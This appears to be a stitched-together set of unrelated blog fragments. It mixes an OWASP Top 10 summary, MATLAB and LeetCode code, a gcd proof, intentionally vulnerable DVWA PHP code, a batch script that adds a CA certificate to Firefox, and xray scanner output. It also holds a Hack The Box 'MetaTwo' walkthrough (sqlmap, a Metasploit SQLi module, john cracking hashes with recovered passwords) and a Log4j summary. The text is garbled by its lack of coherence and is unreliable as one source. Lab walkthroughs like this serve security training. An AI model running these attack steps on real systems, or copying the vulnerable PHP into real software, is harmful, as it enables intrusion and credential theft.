The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
The ten categories (2017 edition):

1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components with Known Vulnerabilities
10. Insufficient Logging and Monitoring
Injection. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

Broken Authentication. Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.

Sensitive Data Exposure. Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.

XML External Entities (XXE). Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.

Broken Access Control. Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as accessing other users’ accounts, viewing sensitive files, modifying other users’ data, changing access rights, etc.

Security Misconfiguration. Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.

Cross-Site Scripting (XSS). XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

Insecure Deserialization. Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.

Using Components with Known Vulnerabilities. Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.

Insufficient Logging & Monitoring. Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
```matlab
%% extract watermark
FA2 = fft2(FAO);             % spectrum of the watermarked image
G = (FA2 - FA) / alpha;      % difference from the original spectrum, scaled back
GG = G;
% undo the row/column permutation used during embedding
for i = 1:imsize(1)*0.5
    for j = 1:imsize(2)
        GG(M(i), N(j), :) = G(i, j, :);
    end
end
% restore the conjugate-symmetric half of the spectrum
for i = 1:imsize(1)*0.5
    for j = 1:imsize(2)
        GG(imsize(1)+1-i, imsize(2)+1-j, :) = GG(i, j, :);
    end
end
figure, imshow(GG); title('extracted watermark');
% imwrite(uint8(GG), 'extracted watermark.jpg');
```
```python
parser.add_argument("--square", help="display a square of a given number", type=int)
parser.add_argument("--cubic", help="display a cubic of a given number", type=int)
```
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Notice that the solution set must not contain duplicate triplets.
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
It does not depend on a browser, so you can even run it on Node.js.
Any polynomial can be written as f(x) = q(x)g(x) + r(x), where r(x) is called the remainder: r(x) = f(x) mod g(x).

If there is no remainder, g(x) is said to divide f(x), written g(x) | f(x).

If f(x) has no factors other than itself and 1, f(x) is called an irreducible polynomial (also a prime polynomial).

Polynomials with coefficients in GF(p), reduced modulo a prime polynomial, form a field.

Euclidean algorithm
Write a = kb + r (with a, b, k, r positive integers and r < b); then r = a mod b.
Suppose d is a common divisor of a and b, written d|a and d|b, i.e. both a and b are divisible by d.
Since r = a - kb, dividing both sides by d gives r/d = a/d - kb/d = m, and the right-hand side shows m is an integer, so d|r.
Hence d is also a common divisor of b and a mod b.
Conversely, suppose d is a common divisor of b and a mod b; then d|b and d|(a - k*b) for the integer k, and so d|a. Hence d is also a common divisor of a and b.
Therefore (a, b) and (b, a mod b) have exactly the same common divisors, so their greatest common divisors must be equal. QED.

A second argument: any integer that divides both a and b also divides a - b (and b), so taking that integer to be gcd(a,b), it cannot exceed the greatest common divisor of a-b and b: gcd(a,b) <= gcd(a-b,b).
Likewise, any integer that divides a-b and b also divides a and b, so taking it to be gcd(a-b,b), it cannot exceed the greatest common divisor of a and b: gcd(a-b,b) <= gcd(a,b).
Hence gcd(a,b) = gcd(a-b,b).
Since there is always an integer n with a - n*b = a mod b, iterating gives gcd(a-b,b) = gcd(a-2b,b) = ... = gcd(a-n*b,b) = gcd(a mod b, b).
Recursive method:

```python
from typing import List


class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        m = len(matrix)
        if m == 0 or len(matrix[0]) == 0:
            return []
        n = len(matrix[0])
        newlist = list(matrix[0])            # top row, left to right
        if m > 1:
            for i in range(1, m):            # right column, top to bottom
                newlist.append(matrix[i][n - 1])
            for j in range(n - 2, -1, -1):   # bottom row, right to left
                newlist.append(matrix[m - 1][j])
            if n > 1:
                for i in range(m - 2, 0, -1):  # left column, bottom to top
                    newlist.append(matrix[i][0])
        # strip the outer ring and recurse on the inner sub-matrix
        M = []
        for k in range(1, m - 1):
            t = matrix[k][1:-1]
            M.append(t)
        return newlist + self.spiralOrder(M)
```
Clearer method:

```python
from typing import List


class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        res = []
        if len(matrix) == 0:
            return []
        # define the four boundaries
        left = 0
        right = len(matrix[0]) - 1
        top = 0
        bottom = len(matrix) - 1
        # walk one full ring per iteration while staying inside the boundaries
        while top < bottom and left < right:
            for i in range(left, right):
                res.append(matrix[top][i])
            for i in range(top, bottom):
                res.append(matrix[i][right])
            for i in range(right, left, -1):
                res.append(matrix[bottom][i])
            for i in range(bottom, top, -1):
                res.append(matrix[i][left])
            left += 1
            top += 1
            right -= 1
            bottom -= 1
        # if a single row or a single column remains
        if top == bottom:
            for i in range(left, right + 1):
                res.append(matrix[top][i])
        elif left == right:
            for i in range(top, bottom + 1):
                res.append(matrix[i][left])
        return res
```
```php
// Checks to see where the request came from
if( stripos( $_SERVER[ 'HTTP_REFERER' ], $_SERVER[ 'SERVER_NAME' ] ) !== false ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];
```
The Referer header is checked against the server name:
```http
GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1
Host: 49.232.78.252:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Referer: http://49.232.78.252:81/vulnerabilities/csrf/
Cookie: PHPSESSID=9mjbjlhio6pup4mq4ne932fbo2; security=medium
Upgrade-Insecure-Requests: 1
```
```php
    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
```
```php
    // Check CAPTCHA from 3rd party
    $resp = recaptcha_check_answer(
        $_DVWA[ 'recaptcha_private_key'],
        $_POST['g-recaptcha-response']
    );

    // Did the CAPTCHA fail?
    if( !$resp ) {
        // What happens when the CAPTCHA was entered incorrectly
        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
        $hide_form = false;
        return;
    }
    else {
        // CAPTCHA was correct. Do both new passwords match?
        if( $pass_new == $pass_conf ) {
            // Show next stage for the user
            echo "
                <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
                <form action=\"#\" method=\"POST\">
                    <input type=\"hidden\" name=\"step\" value=\"2\" />
                    <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
                    <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
                    <input type=\"submit\" name=\"Change\" value=\"Change\" />
                </form>";
        }
        else {
            // Both new passwords do not match.
            $html     .= "<pre>Both passwords must match.</pre>";
            $hide_form = false;
        }
    }
}
```
```php
    // Check to see if both password match
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"]))
            ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new )
            : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Feedback for the end user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with the passwords matching
        echo "<pre>Passwords did not match.</pre>";
        $hide_form = false;
    }
```
```php
?>
<?php
if (isset ($_POST['include'])) {
    $page[ 'body' ] .= "
        " . $_POST['include'] . "
    ";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
';
```
- SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections
- Blind SQL and Blind OS Command injection
- Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)
- Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)
- Cross-Site Request Forgery (CSRF)
- AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)
- Malicious, unrestricted file uploads and backdoor files
- Authentication, authorization and session management issues
- Arbitrary file access and directory traversals
- Local and remote file inclusions (LFI/RFI)
- Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,...
- HTTP parameter pollution and HTTP response splitting
- Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion
- Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations
- HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
- Unvalidated redirects and forwards, and cookie poisoning
- Cookie poisoning and insecure cryptographic storage
- Server Side Request Forgery (SSRF)
- XML External Entity attacks (XXE)
- And much much much more…
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
```text
C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H
-A              Add a certificate to the database (create if needed)
-E              Add an Email certificate to the database (create if needed)
   -n cert-name     Specify the nickname of the certificate to add
   -t trustargs     Set the certificate trust attributes:
                       p    valid peer
                       P    trusted peer (implies p)
                       c    valid CA
                       T    trusted CA to issue client certs (implies c)
                       C    trusted CA to issue server certs (implies c)
                       u    user cert
                       w    send warning
                       g    make step-up cert
   -f pwfile        Specify the password file
   -d certdir       Cert database directory (default is ~/.netscape)
   -P dbprefix      Cert & Key database prefix
   -a               The input certificate is encoded in ASCII (RFC1113)
   -i input         Specify the certificate file (default is stdin)
-C              Create a new binary certificate from a BINARY cert request
   -c issuer-name   The nickname of the issuer cert
   -i cert-request  The BINARY certificate request file
   -o output-cert   Output binary cert to this file (default is stdout)
   -x               Self sign
   -m serial-number Cert serial number
   -w warp-months   Time Warp
   -v months-valid  Months valid (default is 3)
   -f pwfile        Specify the password file
   -d certdir       Cert database directory (default is ~/.netscape)
   -P dbprefix      Cert & Key database prefix
   -1               Create key usage extension
   -2               Create basic constraint extension
   -3               Create authority key ID extension
   -4               Create crl distribution point extension
   -5               Create netscape cert type extension
   -6               Create extended key usage extension
   -7               Create an email subject alt name extension
   -8               Create an dns subject alt name extension
-G              Generate a new key pair
   -h token-name    Name of token in which to generate key (default is internal)
   -k key-type      Type of key pair to generate ("dsa", "rsa" (default))
   -g key-size      Key size in bits, (min 512, max 2048, default 1024)
   -y exp           Set the public exponent value (3, 17, 65537) (rsa only)
   -f password-file Specify the password file
   -z noisefile     Specify the noise file to be used
   -q pqgfile       read PQG value from pqgfile (dsa only)
   -d keydir        Key database directory (default is ~/.netscape)
   -P dbprefix      Cert & Key database prefix
-D              Delete a certificate from the database
   -n cert-name     The nickname of the cert to delete
   -d certdir       Cert database directory (default is ~/.netscape)
   -P dbprefix      Cert & Key database prefix
-U              List all modules
   -d moddir        Module database directory (default is '~/.netscape')
   -P dbprefix      Cert & Key database prefix
   -X               force the database to open R/W
-K              List all keys
   -h token-name    Name of token in which to look for keys (default is internal, use "all" to list keys on all tokens)
   -k key-type      Type of key pair to list ("all", "dsa", "rsa" (default))
   -f password-file Specify the password file
   -d keydir        Key database directory (default is ~/.netscape)
   -P dbprefix      Cert & Key database prefix
   -X               force the database to open R/W
-L              List all certs, or print out a single named cert
   -n cert-name     Pretty print named cert (list all if unspecified)
   -d certdir       Cert database directory (default is ~/.netscape)
   -P dbprefix      Cert & Key database prefix
   -X               force the database to open R/W
   -r               For single cert, print binary DER encoding
   -a               For single cert, print ASCII encoding (RFC1113)
-M              Modify trust attributes of certificate
   -n cert-name     The nickname of the cert to modify
   -t trustargs     Set the certificate trust attributes (see -A above)
   -d certdir       Cert database directory (default is ~/.netscape)
   -P dbprefix      Cert & Key database prefix
-N              Create a new certificate database
   -d certdir       Cert database directory (default is ~/.netscape)
   -P dbprefix      Cert & Key database prefix
-T              Reset the Key database or token
   -d certdir       Cert database directory (default is ~/.netscape)
   -P dbprefix      Cert & Key database prefix
   -h token-name    Token to reset (default is internal)
-O              Print the chain of a certificate
   -n cert-name     The nickname of the cert to modify
   -d certdir       Cert database directory (default is ~/.netscape)
   -P dbprefix      Cert & Key database prefix
   -X               force the database to open R/W
-R              Generate a certificate request (stdout)
   -s subject       Specify the subject name (using RFC1485)
   -o output-req    Output the cert request to this file
   -k key-type      Type of key pair to generate ("dsa", "rsa" (default))
   -h token-name    Name of token in which to generate key (default is internal)
   -g key-size      Key size in bits, RSA keys only (min 512, max 2048, default 1024)
   -q pqgfile       Name of file containing PQG parameters (dsa only)
   -f pwfile        Specify the password file
   -d keydir        Key database directory (default is ~/.netscape)
   -P dbprefix      Cert & Key database prefix
   -p phone         Specify the contact phone number ("123-456-7890")
   -a               Output the cert request in ASCII (RFC1113); default is binary
-V              Validate a certificate
   -n cert-name     The nickname of the cert to Validate
   -b time          validity time ("YYMMDDHHMMSS[+HHMM|-HHMM|Z]")
   -e               Check certificate signature
   -u certusage     Specify certificate usage:
                       C    SSL Client
                       V    SSL Server
                       S    Email signer
                       R    Email Recipient
   -d certdir       Cert database directory (default is ~/.netscape)
   -P dbprefix      Cert & Key database prefix
   -X               force the database to open R/W
-S              Make a certificate and add to database
   -n key-name      Specify the nickname of the cert
   -s subject       Specify the subject name (using RFC1485)
   -c issuer-name   The nickname of the issuer cert
   -t trustargs     Set the certificate trust attributes (see -A above)
   -k key-type      Type of key pair to generate ("dsa", "rsa" (default))
   -h token-name    Name of token in which to generate key (default is internal)
   -g key-size      Key size in bits, RSA keys only (min 512, max 2048, default 1024)
   -q pqgfile       Name of file containing PQG parameters (dsa only)
   -x               Self sign
   -m serial-number Cert serial number
   -w warp-months   Time Warp
   -v months-valid  Months valid (default is 3)
   -f pwfile        Specify the password file
   -d certdir       Cert database directory (default is ~/.netscape)
   -P dbprefix      Cert & Key database prefix
   -p phone         Specify the contact phone number ("123-456-7890")
   -1               Create key usage extension
   -2               Create basic constraint extension
   -3               Create authority key ID extension
   -4               Create crl distribution point extension
   -5               Create netscape cert type extension
   -6               Create extended key usage extension
   -7               Create an email subject alt name extension
   -8               Create an dns subject alt name extension
```
```batch
@echo off
:: enable delayed variable expansion
setlocal EnableExtensions EnableDelayedExpansion

echo ###checking new_version###
echo --------------------------
set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox"
set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox"
set regKey="CurrentVersion"
set regValue=""

set Value1="checkversion"

rem check whether the new-version registry key exists
reg query %regPath1% >nul 2>nul
echo %errorlevel%
echo !errorlevel!
if %errorlevel%==0 (
    echo new_version Registry key %regkey% exists.
    for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do (
        if "%regValue%"=="" (
            echo value not exists
        ) else (
            set Value1=%%b
        )
    )
) else (
    echo new_version Registry key %regkey% does not exist.
    echo --------------------------
    rem check whether the old-version registry path exists
    rem (a :: comment inside a parenthesised block breaks cmd, so rem is used here)
    echo ###checking old_version###
    reg query %regPath2% >nul 2>nul
    if !errorlevel!==0 (
        echo old_version Registry key %regkey% exists.
        for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do (
            if "%regValue%"=="" (
                echo value not exists
            ) else (
                set Value1=%%b
            )
        )
    ) else (
        echo old_version Registry key %regkey% does not exist.
        set Value1=0.0.0
    )
    echo !Value1!
    echo %Value1%
    set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
    echo Majorold: %Major%
)

echo !Value1!
echo %Value1%

rem split a.b.c.d into Major/Minor/Revision/Subrev
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
echo Majornew: %Major%

rem check the version number (Value1 is 0.0.0 when no registry key was found)
if "%Value1%"=="0.0.0" (
    echo Program version is 0. Exiting script...
    exit /b 1
) else if %Major% LSS 49 (
    call :function1
) else (
    call :function2
)

rem exit the script
exit /b

:function1
echo Program version is less than 49. Executing function 1...
rem function 1: for versions below 49, update the cert8.db certificate store.

rem show the existing certificates in the db
set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\"
set default_name=""
rem check whether the certificate database path exists
IF EXIST %db_path% (
    echo default_path exists
    rem add the commands to run here
    set "count=0"
    for /d %%i in ("%db_path%\*") do (
        set /a count+=1
        set "folder=%%~nxi"
    )
    rem check that *.default is the only folder
    if !count! equ 1 (
        set default_name=!folder!
        set "all_path=%db_path%!default_name!"
        rem show the full path of the default folder
        echo !all_path!
        rem show the certificate store before the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
        rem update the certificate store
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path!
        rem show the certificate store after the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
    ) else (
        echo no or more
    )
) ELSE (
    echo no
)
goto :eof

:function2
echo Program version is greater than or equal to 49. Executing function 2...
rem function 2: for Firefox 49 and above, enable security.enterprise_roots.enabled

set source_file_cfg=C:\firefoxinstallcert\ddwi.cfg
set "dest_dir_cfg=C:\Program Files\Mozilla Firefox\"
echo Moving %source_file_cfg% to %dest_dir_cfg%...
if exist "%source_file_cfg%" (
    if exist "%dest_dir_cfg%" (
        copy "%source_file_cfg%" "%dest_dir_cfg%"
    ) else (
        echo Directory %dest_dir_cfg% does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_cfg% does not exist! Cannot move file.
)

set "dest_dir_cfg_x86=C:\Program Files (x86)\Mozilla Firefox\"
echo Moving %source_file_cfg% to %dest_dir_cfg_x86%...
if exist "%source_file_cfg%" (
    if exist "%dest_dir_cfg_x86%" (
        copy "%source_file_cfg%" "%dest_dir_cfg_x86%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_cfg% does not exist! Cannot move file.
)

set source_file_js=C:\firefoxinstallcert\local-settings.js
set "dest_dir_js=C:\Program Files\Mozilla Firefox\defaults\pref\"
echo Moving %source_file_js% to %dest_dir_js%...
if exist "%source_file_js%" (
    if exist "%dest_dir_js%" (
        copy "%source_file_js%" "%dest_dir_js%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_js% does not exist! Cannot move file.
)

set "dest_dir_js_x86=C:\Program Files (x86)\Mozilla Firefox\defaults\pref\"
echo Moving %source_file_js% to %dest_dir_js_x86%...
if exist "%source_file_js%" (
    if exist "%dest_dir_js_x86%" (
        copy "%source_file_js%" "%dest_dir_js_x86%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_js% does not exist! Cannot move file.
)
goto :eof
```
Alternative :function2 that enables security.enterprise_roots.enabled by copying a user.js into the profile directory instead:

```batch
:function2
echo Program version is greater than or equal to 49. Executing function 2...
rem function 2: for Firefox 49 and above, enable security.enterprise_roots.enabled by adding a user.js configuration file

rem default profiles directory
set "parentFolder=%APPDATA%\Mozilla\Firefox\Profiles"
rem search for the folder containing the string "default", i.e. the profile folder
set "searchString=default"
set source_user_js=C:\firefoxinstallcert\user.js
rem copy user.js into the profile directory
IF EXIST %parentFolder% (
    for /d %%F in ("%parentFolder%\*") do (
        echo "%%~nxF" | findstr /C:"%searchString%" >nul 2>&1
        if errorlevel 1 (
            echo default Folder not found.
        ) else (
            echo default Folder found.
            rem build the full path
            set "all_default_path=%parentFolder%\%%~nxF"
            echo !all_default_path!
            copy "%source_user_js%" "!all_default_path!"
        )
    )
) ELSE (
    echo no
)
goto :eof
```
```text
COMMANDS:
   webscan, ws        Run a webscan task
   servicescan, ss    Run a service scan task
   subdomain, sd      Run a subdomain task
   poclint, pl, lint  lint yaml poc
   burp-gamma, btg    Convert the export file of burp historical proxy records to POC format
   transform          transform other script to gamma
   reverse            Run a standalone reverse server
   convert            convert results from json to html or from html to json
   genca              GenerateToFile CA certificate and key
   upgrade            check new version and upgrade self if any updates found
   version            Show version info
   x                  A command that enables all plugins. You can customize new commands or modify the plugins enabled by a command in the configuration file.
   help, h            Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --config FILE      Load configuration from FILE (default: "config.yaml")
   --log-level value  Log level, choices are debug, info, warn, error, fatal
   --help, -h         show help
[INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml

OPTIONS:
   --list, -l                                  list plugins
   --plugins value, --plugin value, --plug value  specify the plugins to run, separated by ','
   --poc value, -p value                       specify the poc to run, separated by ','
   --level value                               specify the level of poc to run, separated by ','
   --tags value                                specify the level of poc to run, separated by ','

   --listen value                              use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111)
   --basic-crawler value, --basic value        use a basic spider to crawl the target and scan the requests
   --browser-crawler value, --browser value    use a browser spider to crawl the target and scan the requests
   --url-file value, --uf value                read urls from a local file and scan these urls, one url per line
   --burp-file value, --bf value               read requests from burpsuite exported file as targets
   --url value, -u value                       scan a **single** url
   --data value, -d value                      data string to be sent through POST (e.g. 'username=admin')
   --raw-request FILE, --rr FILE               load http raw request from a FILE
   --force-ssl, --fs                           force usage of SSL/HTTPS for raw-request

   --json-output FILE, --jo FILE               output xray results to FILE in json format
   --html-output FILE, --ho FILE               output xray result to FILE in HTML format
   --webhook-output value, --wo value          post xray result to url in json format
```
```text
[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml

Enabled plugins: [phantasm]

[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details)
[INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/
[Vuln: phantasm]
Target           "http://example.com/"
VulnType         "poc-yaml-jumpserver-session-replay-unauth/default"
Author           "Chaitin"
Links            ["https://stack.chaitin.com/techblog/detail/156"]

[*] All pending requests have been scanned
[*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00%
[INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done
```
```text
┌──(root@kali)-[/home/h4m5t/Desktop/HTB]
└─# nmap -sV $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 14:53 AEST
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:57 (0:01:15 remaining)
Nmap scan report for 10.129.231.241
Host is up (0.0093s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.02 seconds
```
If we go to http://$IP, we are redirected to http://metapress.htb, so we need to add this domain in /etc/hosts
```text
[15:30:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.24, Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:30:38] [INFO] fetching database names
available databases [2]:
[*] blog
[*] information_schema

[15:30:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
```

```text
[15:38:24] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv'
[15:38:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
```
```text
   #  Name                                                      Disclosure Date  Rank    Check  Description
   -  ----                                                      ---------------  ----    -----  -----------
   0  auxiliary/gather/wp_bookingpress_category_services_sqli   2022-02-28       normal  Yes    Wordpress BookingPress bookingpress_front_get_category_services SQLi

Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_bookingpress_category_services_sqli

msf6 > use 0
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOST metapress.htb
RHOST => metapress.htb
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI /events/
TARGETURI => /events/
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
[*] Running module against 10.129.231.241

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information
Wordpress User Credentials
==========================
```
```text
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt user.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
partylikearockstar (manager)
```

```text
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# ftp metapress.htb@$IP
Connected to 10.129.231.241.
220 ProFTPD Server (Debian) [::ffff:10.129.231.241]
331 Password required for metapress.htb
Password:
230 User metapress.htb logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
```
First let us generate the password hash from the private GPG key using gpg2john and save it into a file named key.hash. Running john then gives an error:

```text
Crash recovery file is locked: /root/.john/john.rec
```

Fix:

```shell
rm /root/.john/john.rec
```

Start cracking:

```text
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# john -wordlist=/usr/share/wordlists/rockyou.txt key.hash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blink182         (Passpie)
1g 0:00:00:02 DONE (2024-09-15 17:48) 0.3937g/s 75.59p/s 75.59c/s 75.59C/s carolina..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed.
graph LR
    A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?}
    C -->|Yes| D[Execute<br>JNDI lookup]
    C -->|No| E[Normal log]
    D --> F[Connect to<br>attacker's server]
    F --> G[Download &<br>execute<br>malicious codes]
    G --> H[Attacker gains<br>server control]
Incident Timeline

timeline
    title Log4j Vulnerability Incident Timeline
    November 24, 2021 : Alibaba researchers discovered Log4Shell and reported it to Apache
    December 10, 2021 : Apache disclosed the Log4j vulnerability (CVSS score 10.0)
    December 13, 2021 : Bitdefender reported attempts to exploit Log4j for Khonsari ransomware
